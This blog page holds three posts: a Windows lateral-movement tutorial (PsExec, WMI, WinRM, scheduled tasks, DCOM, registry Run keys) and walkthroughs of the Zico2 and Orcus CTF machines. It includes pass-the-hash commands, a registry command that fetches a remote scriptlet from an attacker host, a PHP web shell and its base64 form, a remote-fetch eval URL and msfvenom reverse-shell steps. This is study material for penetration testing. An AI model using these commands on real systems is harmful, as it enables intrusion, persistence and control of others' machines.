Monday, November 6, 2017

Windows Lateral Movement Fu

In this post I'm going to detail Windows Lateral Movement tools techniques and procedures (TTPs). Wikipedia defines Lateral Movement as techniques cyber attackers, or "threat actors", use to progressively move through a network as they search for the key data and assets that are ultimately the target of their attack campaigns. This definition is a bit too broad as that would entail everything done by a threat actor between attaining foothold and exfilteration of data. The main focus of this post is in ways an attacker could gain code execution on other systems on a victim network once they have initial foothold or a valid set of credentials. These credentials could be stolen from centralized software installation systems, keyloggers, ARP spoofing, Network sniffing or password dumping toys like Pwdump, Windows Credential Editor (WCE), Mapiget, Lslsass, Gsecdump, CacheDump, Mimikatz, etc.

   The powershell era gave attackers a native way of interacting with the windows core without having to use compiled code as well as an interactive .NET playground. Some of the techniques below can be achieved with or without powershell. I'll try to highlight ways of achieving the same task with powershell wherever possible.   

The following set of techniques assume the attacker has a valid set of credentials/hashes and or a command shell on the target network. I'll start with every pentester's favorite lateral movement technique.

1.  PsExec

This tool is usually run after using mimikatz to dump credentials from memory. What makes it really amazing is that the binary is Microsoft signed although some AVs do flag it. Of course Microsoft's implementation of this tool doesn't support using hashes for authentication. Metasploit and Impacket's implementation of this tool allows us to use both hashes (NTLM) and clear-text credentials whichever you can get your hands on.



The Metasploit way

Metasploit has its implementation of the same. This one allows us to pass the hashes if we don't have the clear-text credentials.




Note that metasploit has two implementations of the psexec module, a legacy one and a powershell version. I've found the powershell version to be more reliable.

Impacket way

psexec.py awenger@192.168.83.129 -hashes E41905232DC05746E5E55D3FD61BC4D6:D53E2D187CAAF9D607133D3DAFC3C3F1




2.  Windows Management Instrumentation (WMI)

WMI is the infrastructure for management data and operations on Windows-based operating systems. WMI enables devices and systems in a network, to be managed and controlled centrally. This is another attacker favorite since enabled by default and doesn't require any additional toys on the compromised system. With this you can basically execute code on a remote system.



We can see the notepad process has been executed on the target system.



Now let's try something more evil.



 Back in our metasploit we get a reverse shell.



In case you don't know how i generated the rev_https.sct file, google subtee Bypass Application Whitelisting Script Protections.

Impacket

Like PSExec Impacket has a toy you can deploy directly form Kali that can take both hashes and plain text passwords.

wmiexec.py awenger@192.168.83.129 -hashes E41905232DC05746E5E55D3FD61BC4D6:D53E2D187CAAF9D607133D3DAFC3C3F1



Powershell

Note that with newer versions of Windows ie 2012+, WMIC is deprecated. PowerShell provides the same functionality with the Invoke-WMIMethod cmdlet. So lets see what Invoke-WMIMethod can do for us.

Lets first generate the payload



Set up our metasploit handler



We can see that we got a reverse connection on execution.



Powersploit also has its own WMI implementation called Invoke-WmiCommand. I'll leave that one as an exercise to those following along.

3.  Windows Remote Management (WinRM)

Microsoft defines Windows RM as a remote management service that allows hardware and operating systems, from different vendors, to interoperate. WinRM is the server part of the application and WinRS (Windows Remote Shell) is the client part of the application. The service has to enabled on both systems for it to work. We'll use the WinRS tool when running commands on the target system  Windows Remote Management isn't enabled by default but when it is, it has the look and feel of the psexec binary. Its relatively trivial to use. You basically have a shell on the target system. If the boxes are in an active directory environment, theres no need to provide credentials since the machines have Kerberos trust between them.



My test machines are domain joined, if you want to try these out without domain joining the boxes check out this link.

There are a number of powershell implementations of Windows Remote Management. We're going to see some of them in action. Invoke-Command and PSSession commands are more or less the same,the main difference between them is that former can be unleashed on multiple boxes with a single command while PSSession can only run on one box.

Invoke-Command



Note: The download cradle was obfuscated by Daniel Bohannon's Invoke-CradleCrafter

Invoke-Command is quite flexible, you can give it a path to a file to execute on the remote system. As with with all inbuilt powershell commands Get-Help is your friend.

PSSession

Lets see what the PSSession commands can do for us



A variation of the PSSession set of commands is the Enter-PSSession, you can guess from the name that it gives you an interactive session on the target machine. As you know metasploit and interactive sessions don't play well together, I'll run it from a windows box



We can even mix it up to run commands on the target system.



4.  Service Control (SC)

SC.exe is an inbuilt windows utility that retrieves and sets control information about services. Its a little powerful utility that can start, stop and interact with windows services, and the fact that it can be used control other system's services remotely makes it an interesting tool for lateral movement. Using a normal exe binary with sc will cause it to die immediately after execution. This means we have to generate a binary that's capable of responding to service control commands. Lucky for us metasploit can generate such binaries. The downside is that it'll probably be flagged by AV since all metasploit containers are deemed dangerous. You'll have to modify the binary to evade AV. AV evasion is beyond the scope of this post but you can read more on how to do it from here and here.





Let's transfer our shiny new evil binary to the system we control



We'll check to make sure the service we're trying to create doesn't exist before we actually create it.



5.  Scheduled Tasks

This technique is super flexible, you can schedule the tasks to run on triggering an event like for example on system log on. You can fine tune it to run on the days of your choice. This makes it even a potent persistence technique. The catch of course is that it requires admin rights on the target system.



For good Opsec we'll remove scheduled tasks and also check to make sure the task has been removed.



6.  AT

This is the younger brother of scheduled tasks. Its not a powerful as scheduled tasks but for what we want to accomplish, its sufficient. You can schedule commands and programs to run on a computer at a specified time and date.



7. MM20 Application DCOM

All the other techniques discussed in this post have been around for an eternity. This next one was discovered / made public by enigma0x3. It takes advantage of the fact that Distributed Component Object Model (DCOM) has the ability to interact with objects over the network.  He has a detailed way of how he enumerated the objects and eventually got code execution in his blog post here. He has variations in this technique where he abuses MS Office to achieve code execution, read about here. I advise everyone starting out to read this guy's whole website.



We'll get an empire reverse shell



8.  RDP

Well The RDP protocol is as old as age. Its syntax is pretty straight forward.




9.  Remote File Access

This next couple of techniques require the compromised system to have Read-Write file permissions on the entire root drive of another system. We have to wait for the targeted system to be restarted then we can get our reverse shell. This can also double as a persistence technique unless you explicitly remove the uploaded trojan.

Robocopy




Xcopy

This is the younger brother to robocopy. Only the syntax changes but the functionality remains the same.Can read more about it here.




There are variations to this technique in that you can leverage dll hijacking or plant dlls at specific locations to get code execution. These techniques can even double as privilege escalation technique depending on folder permissions and windows version. More information on how that can be achieved is available here

10.  Remote Registry Access / Manipulation

Writing to any of these registry keys will trigger code execution. These locations are also malware favorites for persistence. The HKCU can be substituted for HKLM. The only difference is that HKCU will be executed under the context of the current user while HKLM will execute under the context of whoever is logged on.
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
REG ADD \\192.168.83.129\HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v evilkey /t REG_SZ /d "regsvr32 /s /n /u /i:http://192.168.83.175/Expendable/rev_https.sct scrobj.dll"
REG QUERY \\192.168.83.129\HKLM\Software\Microsoft\Windows\CurrentVersion\Run




-Pass the ticket

References

https://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/
https://www.jpcert.or.jp/english/pub/sr/20170612ac-ir_research_en.pdf
https://www.scriptjunkie.us/2013/02/authenticated-remote-code-execution-methods-in-windows/
https://posts.specterops.io/lateral-movement-using-excel-application-and-dcom-enigma0x3-on-wordpress-com-d11d56e504dc
http://www.fuzzysecurity.com/tutorials/19.html


Posted by at No comments:

Wednesday, October 11, 2017

Owning Zico2

Over the past week, vulnhub dropped about 20 wargames. I decided try my hand a couple. I'll be blogging as i solve them assuming the time allows. This is my walkthrough for the Zico2 ctf

After loading the vm into vmware, scanned with nmap. Port 80 as usual appeared to be the most interesting. So i fired up nikto and then dirsearch in that order.
root@kali:/tmp# nmap -sT -A -PO -n -v 192.168.83.133
Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-09 09:39 EDT
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:40
Completed NSE at 09:40, 0.00s elapsed
Initiating NSE at 09:40
Completed NSE at 09:40, 0.00s elapsed
Initiating ARP Ping Scan at 09:40
Scanning 192.168.83.133 [1 port]
Completed ARP Ping Scan at 09:40, 0.22s elapsed (1 total hosts)
Initiating Connect Scan at 09:40
Scanning 192.168.83.133 [1000 ports]
Discovered open port 22/tcp on 192.168.83.133
Discovered open port 80/tcp on 192.168.83.133
Discovered open port 111/tcp on 192.168.83.133
Completed Connect Scan at 09:40, 0.03s elapsed (1000 total ports)
Initiating Service scan at 09:40
Scanning 3 services on 192.168.83.133
Completed Service scan at 09:40, 6.15s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.83.133
adjust_timeouts2: packet supposedly had rtt of -175891 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -175891 microseconds. Ignoring time.
NSE: Script scanning 192.168.83.133.
Initiating NSE at 09:40
Completed NSE at 09:40, 0.29s elapsed
Initiating NSE at 09:40
Completed NSE at 09:40, 0.01s elapsed
Nmap scan report for 192.168.83.133
Host is up (0.00053s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 68:60:de:c2:2b:c6:16:d8:5b:88:be:e3:cc:a1:25:75 (DSA)
| 2048 50:db:75:ba:11:2f:43:c9:ab:14:40:6d:7f:a1:ee:e3 (RSA)
|_ 256 11:5d:55:29:8a:77:d8:08:b4:00:9b:a3:61:93:fe:e5 (ECDSA)
80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Zico's Shop
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 35817/udp status
|_ 100024 1 49910/tcp status
MAC Address: 00:0C:29:A2:5A:63 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Uptime guess: 198.046 days (since Sat Mar 25 08:33:47 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=265 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.53 ms 192.168.83.133
NSE: Script Post-scanning.
Initiating NSE at 09:40
Completed NSE at 09:40, 0.00s elapsed
Initiating NSE at 09:40
Completed NSE at 09:40, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.23 seconds
Raw packets sent: 36 (2.850KB) | Rcvd: 32 (2.322KB)
root@kali:~/dirsearch# nikto -h http://192.168.83.133
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.83.133
+ Target Hostname: 192.168.83.133
+ Target Port: 80
+ Start Time: 2017-10-09 09:40:28 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, inode: 3803593, size: 7970, mtime: Thu Jun 8 15:18:30 2017
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.26
+ 8346 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time: 2017-10-09 09:40:49 (GMT-4) (21 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
view raw bash hosted with ❤ by GitHub 
root@kali:~/dirsearch# ./dirsearch.py -u http://192.168.83.133/ -e php 

 _|. _ _  _  _  _ _|_    v0.3.7
(_||| _) (/_(_|| (_| )

Extensions: php | Threads: 10 | Wordlist size: 5992

Error Log: /root/dirsearch/logs/errors-17-10-09_09-50-00.log

Target: http://192.168.83.133/

[09:50:00] Starting: 
[09:50:02] 403 -  286B  - /.hta
[09:50:02] 403 -  293B  - /.ht_wsr.txt
[09:50:02] 403 -  297B  - /.htaccess-local
[09:50:02] 403 -  295B  - /.htaccess-dev
[09:50:02] 403 -  295B  - /.htaccess.BAK
[09:50:02] 403 -  297B  - /.htaccess-marco
[09:50:02] 403 -  295B  - /.htaccess.old
[09:50:02] 403 -  296B  - /.htaccess.bak1
[09:50:02] 403 -  298B  - /.htaccess.sample
[09:50:02] 403 -  296B  - /.htaccess.orig
[09:50:02] 403 -  296B  - /.htaccess.save
[09:50:02] 403 -  295B  - /.htaccess.txt
[09:50:02] 403 -  297B  - /.htaccess_extra
[09:50:02] 403 -  296B  - /.htaccess_orig
[09:50:02] 403 -  294B  - /.htaccessBAK
[09:50:02] 403 -  295B  - /.htaccessOLD2
[09:50:02] 403 -  294B  - /.htaccessOLD
[09:50:03] 403 -  294B  - /.htaccess_sc
[09:50:03] 403 -  292B  - /.htaccess~
[09:50:03] 403 -  290B  - /.htgroup
[09:50:03] 403 -  295B  - /.htpasswd-old
[09:50:03] 403 -  296B  - /.htpasswd_test
[09:50:03] 403 -  290B  - /.htusers
[09:50:03] 403 -  292B  - /.htpasswds
[09:50:18] 403 -  290B  - /cgi-bin/
[09:50:21] 301 -  314B  - /css  ->  http://192.168.83.133/css/
[09:50:21] 301 -  318B  - /dbadmin  ->  http://192.168.83.133/dbadmin/
[09:50:21] 200 -  917B  - /dbadmin/
[09:50:22] 403 -  286B  - /doc/
[09:50:22] 403 -  301B  - /doc/en/changes.html
[09:50:22] 403 -  300B  - /doc/stable.version
[09:50:24] 200 -    3KB - /gulpfile.js
[09:50:25] 301 -  314B  - /img  ->  http://192.168.83.133/img/
[09:50:25] 200 -    8KB - /index
[09:50:26] 200 -    8KB - /index.html
[09:50:27] 301 -  313B  - /js  ->  http://192.168.83.133/js/
[09:50:27] 200 -    1KB - /LICENSE
[09:50:34] 200 -  789B  - /package.json
[09:50:34] 200 -  789B  - /package
[09:50:38] 200 -    1KB - /README.md 
[09:50:40] 403 -  295B  - /server-status
[09:50:40] 403 -  296B  - /server-status/
[09:50:44] 200 -    8KB - /tools
[09:50:45] 200 -    0B  - /view.php

Task Completed
The dbadmin folder obviously looked the most interesting. So i quicky browsed it. This inturn led me to htpp://192.168.83.133/dbadmin/test_db.php At the prompt i logged in with default credentilas of admin. I then searched for existing vulnerabilities in phpliteadmin.


At this point i tried to follow along what the advisory said but was a little handcapped since the screenshots were nolonger up.
The screenshots below show how i managed to execute code on the zico2 box




Click "Go"



fill in as shown in the screenshot (under the Default Value field put <?php phpinfo()?> as in the advisory) then click "Create"
You should be greeted with a message that shows that the table was successfully created as in the screenshot below



after that click on "/usr/databases/test.php" the click the "Rename Database" tab



I chose that folder (dbadmin) since thats the location of the default test_db.php file
At this point browsing to the http://192.168.83.133/dbadmin/west.php we should have the phpinfo file displayed to us as in the screenshot below



Now we know we have code execution. Next step is to upload something more evil like a command shell. When i directly uploaded a command shell, it didnt work so i base64 encoded it.
The steps for uploading are the same as above with a small difference of base64 encoding the it.

root@kali:/tmp# cp /usr/share/webshells/php/simple-backdoor.php .


Modify and remove the php tags so it looks like below. 

root@kali:/tmp# cat simple-backdoor.php 
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
Now base64 encode it
root@kali:/tmp# msfvenom -p generic/custom -e php/base64 -f raw PAYLOADFILE=simple-backdoor.php
No platform was selected, choosing Msf::Module::Platform from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 226 (iteration=0)
php/base64 chosen with final size 226
Payload size: 226 bytes
eval(base64_decode(aWYoaXNzZXQoJF9SRVFVRVNUWydjbWQnXSkpewogICAgICAgIGVjaG8gIjxwcmU.chr(43).IjsKICAgICAgICAkY21kID0gKCRfUkVRVUVTVFsnY21kJ10pOwogICAgICAgIHN5c3RlbSgkY21kKTsKICAgICAgICBlY2hvICI8L3ByZT4iOwogICAgICAgIGRpZTsKfQoK));
view raw msfvenom hosted with ❤ by GitHub

Paste the resulting code into the default value field.

<php? <base64 encoded code goes here without the angle brackets :-)> ?>



As before rename the database to whatever you like, I named mine bd.php. We should now have a functional shell.



However this shell is a little limited so we'll use metasploit to get a better shell.


http://192.168.83.133/dbadmin/bd.php?cmd=php%20-d%20allow_url_fopen=true%20-r%20%22eval%28file_get_contents%28%27http://192.168.83.175:8081/RwdifigI%27%29%29;%22
#I didnt like this shell as well since it kept dying on me.
root@kali:/tmp# msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.83.175 LPORT=9999 EXITFUNC=thread -a x64 -f elf -o shell9999.elf
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: shell9999.elf
root@kali:/tmp# file shell9999.elf
shell9999.elf: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, corrupted section header size
root@kali:/tmp# cp shell9999.elf /var/www/html/
root@kali:/tmp# nc -lvp 9999
listening on [any] 9999 ...
view raw msfvenom2 hosted with ❤ by GitHub


I downloaded the linux exploit sugester onto the system and the first exploit did the trick. gcc wasnt working well on the victim box so i compiled the exploit on another box then returned it to the victim box which gave me a root shell.


Finally browsed to the root folder and read the flat.txt file. At this point i was obliged to do the rewt dance :-)


Thanks to Rafael and the team over at vulnhub for the challenges.
Posted by at No comments:

Monday, March 27, 2017

Solving hackfest2016: Orcus VM

Its taken me a while to pwn this challenge partly because it runs too many services and web apps and also partly my lousy attention span. I went down a certain path burnt about 6 hours only to make no serious progress and return to the enumeration phase. Probably my biggest take away from this box is throughly map the application before attempting exploitation and avoid skipping around, this helps prevent futile attempts from working with limited knowledge.
Enough with the philosophical yadda yaddah.
    First I fired up nmap and as in the previous series gazillion services were running.
root@kali:/tmp# nmap -sT -A -PO 172.16.94.136
Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-20 14:13 EDT
Nmap scan report for 172.16.94.136
Host is up (0.0055s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_ 256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
53/tcp open domain ISC BIND 9.10.3-P4-Ubuntu
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 30 disallowed entries (15 shown)
| /exponent.js.php /exponent.js2.php /exponent.php
| /exponent_bootstrap.php /exponent_constants.php /exponent_php_setup.php
| /exponent_version.php /getswversion.php /login.php /overrides.php
| /popup.php /selector.php /site_rss.php /source_selector.php
|_/thumb.php
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: TOP STLS CAPA RESP-CODES SASL AUTH-RESP-CODE UIDL PIPELINING
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after: 2026-10-09T03:44:10
|_ssl-date: ERROR: Script execution failed (use -d to debug)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/udp nfs
| 100005 1,2,3 50518/udp mountd
| 100005 1,2,3 58138/tcp mountd
| 100021 1,3,4 33074/tcp nlockmgr
| 100021 1,3,4 56493/udp nlockmgr
| 100227 2,3 2049/tcp nfs_acl
|_ 100227 2,3 2049/udp nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: ENABLE IMAP4rev1 more have post-login IDLE ID SASL-IR listed capabilities STARTTLS OK LOGINDISABLEDA0001 Pre-login LOGIN-REFERRALS LITERAL+
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after: 2026-10-09T03:44:10
|_ssl-date: ERROR: Script execution failed (use -d to debug)
443/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 3a:48:6e:8e:3f:32:26:f8:b6:a1:c6:b1:70:73:37:75 (RSA)
|_ 256 04:55:e6:48:50:d6:93:d7:12:80:a0:68:bc:97:fa:33 (ECDSA)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after: 2026-10-09T03:44:10
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: TOP USER CAPA RESP-CODES SASL(PLAIN) AUTH-RESP-CODE UIDL PIPELINING
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2016-10-09T03:44:10
|_Not valid after: 2026-10-09T03:44:10
|_ssl-date: ERROR: Script execution failed (use -d to debug)
2049/tcp open nfs_acl 2-3 (RPC #100227)
MAC Address: 00:0C:29:74:06:F8 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop
Service Info: Host: ORCUS; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h59m23s, deviation: 0s, median: 2h59m23s
|_nbstat: NetBIOS name: ORCUS, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: \x00
| NetBIOS computer name: ORCUS\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2017-03-20T17:14:14-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol
TRACEROUTE
HOP RTT ADDRESS
1 5.48 ms 172.16.94.136
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 120.34 seconds
view raw orcus:nmap hosted with ❤ by GitHub

I straight away went to port 80 and fired up nikto and got a mouthful of interesting folders and webapps to follow up. I also fired up dirb to see if i could find any extra folders.
root@kali:/tmp# nikto -h http://172.16.94.136
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 172.16.94.136
+ Target Hostname: 172.16.94.136
+ Target Port: 80
+ Start Time: 2017-03-20 14:16:42 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x65 0x53ff6086e56aa
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/exponent.js.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent.js2.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent_bootstrap.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent_constants.php' in robots.txt returned a non-forbidden or redirect HTTP code (500)
+ Entry '/exponent_php_setup.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/exponent_version.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/getswversion.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/login.php' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/overrides.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/selector.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/site_rss.php' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/source_selector.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/thumb.php' in robots.txt returned a non-forbidden or redirect HTTP code (302)
+ Entry '/ABOUT.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/CHANGELOG.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/CREDITS.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALLATION.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/README.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/RELEASE.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/TODO.md' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /files/: Directory indexing found.
+ Entry '/files/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /tmp/: Directory indexing found.
+ Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 30 entries which should be manually viewed.
+ Multiple index files found: /index.html, /index.php
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ OSVDB-2870: /index.php?download=/etc/passwd: Snif 1.2.4 allows any file to be retrieved from the web server.
+ OSVDB-59085: /index.php?|=../../../../../../../../../etc/passwd: Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.
+ /index.php?page=../../../../../../../../../../etc/passwd: The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)
+ OSVDB-59085: /index.php?l=forum/view.php&topic=../../../../../../../../../etc/passwd: Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.
+ OSVDB-8193: /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc/&view=passwd: EW FileManager for PostNuke allows arbitrary file retrieval.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3092: /files/: This might be interesting...
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3092: /tmp/: This might be interesting...
+ OSVDB-3092: : This might be interesting... possibly a system shell found.
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ /phpmyadmin/: phpMyAdmin directory found
+ 9338 requests: 0 error(s) and 48 item(s) reported on remote host
+ End Time: 2017-03-20 14:17:09 (GMT-4) (27 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
view raw orcus:nikto hosted with ❤ by GitHub

There are so many seemingly vulnerable or actually vulnerable web apps especially in the /external/ directory I'll never know for sure so naturally I spent a long time here (so many wild goose chases).

At this URL http://172.16.94.136/backups/ I downloaded the SimplePHPQuiz-Backupz.tar.gz but didnt have the permissions to download the ssh-creds.bak. I some how already knew it wouldnt amount to much. I extracted the the folder and went to the configs folder and found database credentials.
 
<?php 
//Set the database access information as constants
DEFINE ('DB_USER', 'dbuser');
DEFINE ('DB_PASSWORD', 'dbpassword');
DEFINE ('DB_HOST', 'localhost');
DEFINE ('DB_NAME', 'quizdb');

@ $dbc = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);

if (mysqli_connect_error()){

    echo "Could not connect to MySql. Please try again";
    exit();

}
?>
With this I immediately went to the http://172.16.94.136/phpmyadmin/ and logged in. Boom!!
         Now we have credentials to phpmyadmin all that is left is write a shell using mysql browse to it then get a shell.....

except it didnt happen that way as the credentials didn't have write permission to the web root. It didnt even have FILE permissions. The VM is loaded with a few databases so I decided to try one by one to see if there were backends to other webapps that we hadnt got in the enumeration phase. We were thanked with the /zenphoto/ folder which was an app that was missed by all my scanning and web bruting attempts. I browsed to it and had to install it first. I used the credentials from the SimplePHPQuiz-Backupz.tar.gz and successfully installed it.


At this point the plan was to find a point to upload a webshell and get a reverse connection. I did this by
Plugins --> Uploader ---> tick enable "elFinder" then Apply

Go to Upload tab--> Click Files (elFinder)--> Zen photodata, Right click on the on the pane on the right, Click --> create new text and then copy everyones favorite php-reverse-shell


After copying it, right click edit and then change the file extension to php, then right click again and then click Open. (remember to have set up a netcat listener). Then we'll get a limited reverse-shell.



www-data@Orcus:/tmp/rooter$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@Orcus:/tmp/rooter$ cd /var/www
cd /var/www
www-data@Orcus:/var/www$ ls
ls
9bd556e5c961356857d6d527a7973560-zen-cart-v1.5.4-12302014.zip
a0c4f0d176f87ceda9b9890af09ed644-Adem-master.zip
b873fef091715964d207daa19d320a99-zenphoto-zenphoto-1.4.10.tar.gz
flag.txt
html
zenphoto-zenphoto-1.4.10
www-data@Orcus:/var/www$ cd html
cd html
www-data@Orcus:/var/www/html$ ls
ls
